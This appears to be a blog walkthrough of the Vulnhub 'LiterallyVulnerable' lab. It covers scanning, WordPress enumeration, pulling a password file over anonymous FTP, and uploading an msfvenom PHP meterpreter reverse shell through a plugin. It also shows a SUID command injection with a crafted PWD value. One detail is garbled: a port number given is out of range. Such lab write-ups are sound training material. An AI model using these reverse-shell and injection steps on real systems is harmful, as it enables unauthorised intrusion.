Vulnhub LiterallyVulnerable – Walkthrough

Scan the host with nmap : nmap –A –T4 –p- 192.168.1.9 –vv

As we visit the host ip, it’s running wordpress service

Lets run wpscan to enumerate users names

Wpscan –url http://192.168.1.9 –e u

Now we can confirm that we have the user admin

we can see from nmap scan that ftp service is open and its using anonymous login and there is a file called backupPasswords

We logged in using ftp 192.168.1.9 and then the username anonymous, listing the directory we can see the file backupPasswords, now we download it using the command get

Trying to brute force the ssh and the ftp services with the username Doe and the file with the passwords didn’t work.

Using dirb on the host came with results but no so useful, but trying it with port 655635 came with good results, path /phpcms.

The page is for a user named John and not Don, so lets wpscan it and see what we can find.

Two usernames maybeadmin – notadmin, I tried the first username against the backupPassword file and I got a login using the password $EPid%J2L9LufO5

I went straight to the Secure Post and viewing it we can see the other username and the password.

Now lets login using the new username and password, after that we can upload a shell using the plugins, search for file manager in the plugins and install it, open it and upload a php shell using msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.11 LPORT=443 -f raw > shell.php

Just right click on the shell and view it while metasploit is running using a multi/handler  and we will get a shell.

Now lets do some privilege escalation on the host.

The itseasy file is SUID binary file we can manipulate with  “ export PWD=’;/bin/bash’ “ and then run it to get into John privilege shell.

Going to John’s home directory there is a folder .local where inside it more folders and finally a text file with some information looks to be a 64code, encoding it we got a password to login to ssh service.

Ok now we need to create file named test.html in the path var/www/html, but when trying to create it with John it gave us permission denied, so I went back to Doe and created the file and gave it permission then went to John in ssh session and ran it again.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s